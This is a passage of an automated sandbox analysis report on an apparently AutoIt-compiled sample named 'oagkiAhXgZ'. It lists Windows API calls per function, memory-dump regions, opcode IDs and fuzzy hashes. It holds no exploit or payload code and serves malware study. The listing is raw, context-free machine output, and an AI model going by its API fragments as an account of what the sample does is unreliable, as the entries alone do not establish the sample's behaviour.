                                                                                                      • Part of subcall function 00AA1B4A: RegisterWindowMessageW.USER32(00000004,?,00AA12C4), ref: 00AA1BA2
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AA136A
                                                                                                    • OleInitialize.OLE32 ref: 00AA1388
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00AE24AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1986988660-0
                                                                                                    • Opcode ID: 135fe70a073280cf2685ef2b45851f3bb26239ddb0b4052aa52d183c0ec0da37
                                                                                                    • Instruction ID: 898d4cabcbd235c0f3dea2378916646e41f1220672ac38de7aa56b50b913bb9d
                                                                                                    • Opcode Fuzzy Hash: 135fe70a073280cf2685ef2b45851f3bb26239ddb0b4052aa52d183c0ec0da37
                                                                                                    • Instruction Fuzzy Hash: 2A71ACB59212008FC388EFBDAD466553BE5FBA9344B558A6AD41ED73A1EF308480CF71
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B0C259
                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00B0C261
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B0C270
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                    • String ID:
                                                                                                    • API String ID: 3500052701-0
                                                                                                    • Opcode ID: 77fcc27eb6df3668fd491363219abde984c714da5acdf3ce6d990a17f0036d7a
                                                                                                    • Instruction ID: b24c3d488a910d5185646ffd86d41bd41f7cfc608ba4ad45bbfe2c63ead61dfa
                                                                                                    • Opcode Fuzzy Hash: 77fcc27eb6df3668fd491363219abde984c714da5acdf3ce6d990a17f0036d7a
                                                                                                    • Instruction Fuzzy Hash: 8E319371904344AFEB229FA48895BEBBFECAF06304F1044DEE5DAA7281C7745A84CB51
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD8704
                                                                                                    • GetLastError.KERNEL32(?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD870E
                                                                                                    • __dosmaperr.LIBCMT ref: 00AD8739
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2583163307-0
                                                                                                    • Opcode ID: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
                                                                                                    • Instruction ID: 7f29f3d6a3f8b9f90d643b5500d71dd3fb4e38d7051e2bb148b320ade98312f8
                                                                                                    • Opcode Fuzzy Hash: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
                                                                                                    • Instruction Fuzzy Hash: 82016D33E056602AD6247734A945B7E7B598B92B74F39011FF81B9F3D2DEB8CC819290
                                                                                                    APIs
                                                                                                    • TranslateMessage.USER32(?), ref: 00AADB7B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00AADB89
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00AADBB1
                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00AF1CC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3288985973-0
                                                                                                    • Opcode ID: b8fed73eb1fc5f2bd50375ecd4bea0f54423873f4a27aa23bd886fdc347adeca
                                                                                                    • Instruction ID: 3ca273baf60c87397e1d7c14a48edceecf402defb06e31c982dd8582897a097d
                                                                                                    • Opcode Fuzzy Hash: b8fed73eb1fc5f2bd50375ecd4bea0f54423873f4a27aa23bd886fdc347adeca
                                                                                                    • Instruction Fuzzy Hash: 47F05E31644344DBE730CBA4CC49FEA77BCEB49310F104918F65A930C0DB30A8888B26
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B12CD4,?,?,?,00000004,00000001), ref: 00B12FF2
                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B13006
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B1300D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397143404-0
                                                                                                    • Opcode ID: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
                                                                                                    • Instruction ID: 05b14bf4ff7330c7afcc80a7063a458893e18b1e6f7ee5b01b5d6596a34fefe3
                                                                                                    • Opcode Fuzzy Hash: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
                                                                                                    • Instruction Fuzzy Hash: C2E0863228061077D2301795BC0DFCF3E5CD78AF71F204210F719760D04AA0590153A8
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00AB17F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    • Opcode ID: 067d6b17fded2d71f0877f3c8e3502df3e397f52f9828c156a8a5f1c05fced5f
                                                                                                    • Instruction ID: 560ebead766195665d5c8d34b91e5575aa9704b2068fc076f93ef5a2fe500a1e
                                                                                                    • Opcode Fuzzy Hash: 067d6b17fded2d71f0877f3c8e3502df3e397f52f9828c156a8a5f1c05fced5f
                                                                                                    • Instruction Fuzzy Hash: 51229D70608301DFC714DF14C5A0AAABBF9BF85314F688A5DF5968B3A2D731E845CB92
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00B16F6B
                                                                                                      • Part of subcall function 00AA4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad_wcslen
                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                    • API String ID: 3312870042-2806939583
                                                                                                    • Opcode ID: 87141ae9665403f8ea5db6c670e5071046132b14d18dc125c82ee99f5fb7c782
                                                                                                    • Instruction ID: 1db5d5c0eb1b841c2188220d5746cc01351c6029cd31ea63c4bf80c7da0cb430
                                                                                                    • Opcode Fuzzy Hash: 87141ae9665403f8ea5db6c670e5071046132b14d18dc125c82ee99f5fb7c782
                                                                                                    • Instruction Fuzzy Hash: 3BB180315082019FCB14EF20C9919AFB7E5EF99310F54895DF496972A2EF30ED89CB92
                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00AE2C8C
                                                                                                      • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                                                                                                      • Part of subcall function 00AA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X
                                                                                                    • API String ID: 779396738-3081909835
                                                                                                    • Opcode ID: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
                                                                                                    • Instruction ID: a393f0f79a8c1b2ca6d93ac26e5edd9070953d08ba24f09558c748cab1af95dd
                                                                                                    • Opcode Fuzzy Hash: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
                                                                                                    • Instruction Fuzzy Hash: A921A871A002989FDF01DF98C945BDE7BFC9F49304F104059E405B7281DFB859898FA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID: EA06
                                                                                                    • API String ID: 2638373210-3962188686
                                                                                                    • Opcode ID: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
                                                                                                    • Instruction ID: fa2c6f4c1e6404344396a638957603a37e8cedfaa2b06432f9116c48c487781a
                                                                                                    • Opcode Fuzzy Hash: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
                                                                                                    • Instruction Fuzzy Hash: 0401B172944258BEDF28C7A8C856FEEBBF8DB15301F00459EE192D2181E5B8E6188B60
                                                                                                    APIs
                                                                                                      • Part of subcall function 017C4358: GetFileAttributesW.KERNELBASE(?), ref: 017C4363
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 017C4C5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesCreateDirectoryFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3401506121-0
                                                                                                    • Opcode ID: 80201d5cac7443383098dc845ef8fe9a8e5c0fe013b506a2998ac35305411d97
                                                                                                    • Instruction ID: dad68c1f25e6113e0bec8aefad823daa251916657be10e38b52632d1b106d252
                                                                                                    • Opcode Fuzzy Hash: 80201d5cac7443383098dc845ef8fe9a8e5c0fe013b506a2998ac35305411d97
                                                                                                    • Instruction Fuzzy Hash: 2061A331A1020D96EF14EFB0D854BEFB33AEF58700F00556DA60DEB290EB759A49CB65
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction ID: f7cf4c0e8a82f5c67458d0953ad8326780d133e518f8cfcf0aa214bd9f28af50
                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction Fuzzy Hash: DE31D375A00109DFC718CF59D880AA9FBB9FF4A304B2886A5E809CB656D731EDC1DBC0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                                                                                                      • Part of subcall function 00AA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                                                                                                      • Part of subcall function 00AA4E90: FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                                                                                                      • Part of subcall function 00AA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                                                                                                      • Part of subcall function 00AA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                                                                                                      • Part of subcall function 00AA4E59: FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2632591731-0
                                                                                                    • Opcode ID: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
                                                                                                    • Instruction ID: a011fd08c387246729e229da90b94917d1b68460519b128888edc472467c7642
                                                                                                    • Opcode Fuzzy Hash: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
                                                                                                    • Instruction Fuzzy Hash: 5D11C432610205AECF24EB60DE06FAD77A59F89B10F20442DF552A71D1EFB0AA459750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
                                                                                                    • Instruction ID: 512ed111cadafb47f1db1dd8d4e36807a919b9cb760d1b07d081b143d4dc10b7
                                                                                                    • Opcode Fuzzy Hash: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
                                                                                                    • Instruction Fuzzy Hash: 7C1118B590410AAFCB05DF58E941A9B7BF5FF48314F10405AF809AB312DB31EA11CBA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AD4C7D: RtlAllocateHeap.NTDLL(00000008,00AA1129,00000000,?,00AD2E29,00000001,00000364,?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?), ref: 00AD4CBE
                                                                                                    • _free.LIBCMT ref: 00AD506C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                    • Instruction ID: ace1fd19c36672916289d1f3497af005be5610ea35cd03c9d0b7fd276f115f70
                                                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                    • Instruction Fuzzy Hash: 3E0149726047046FE3318F65D881A5AFBECFB89370F25052EE195833C0EA30A905C7B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                    • Instruction ID: 1f7b490ba3b0063032b5f82e03b915a5691d48fff2b89119b367ca7ff1b3f61a
                                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                    • Instruction Fuzzy Hash: 8CF02836521A109BDB317B798E05F5A339D9F62330F12072EF422933D2DB74E801C6A5
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00AA1129,00000000,?,00AD2E29,00000001,00000364,?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?), ref: 00AD4CBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: e5acffb16ad0fc1674fc8cd5884b1a9c3809ffb640bca531fe67399ada1bfdb2
                                                                                                    • Instruction ID: 48b112820dca905fd163365bd14f52b86c477a2bb86deb8ece5940bdbdbcf06d
                                                                                                    • Opcode Fuzzy Hash: e5acffb16ad0fc1674fc8cd5884b1a9c3809ffb640bca531fe67399ada1bfdb2
                                                                                                    • Instruction Fuzzy Hash: 86F0593122732067DB201F629D09F5A3798BF487A0B164117F80BBB380CF30D80082E0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    • _free.LIBCMT ref: 00ADFDE4
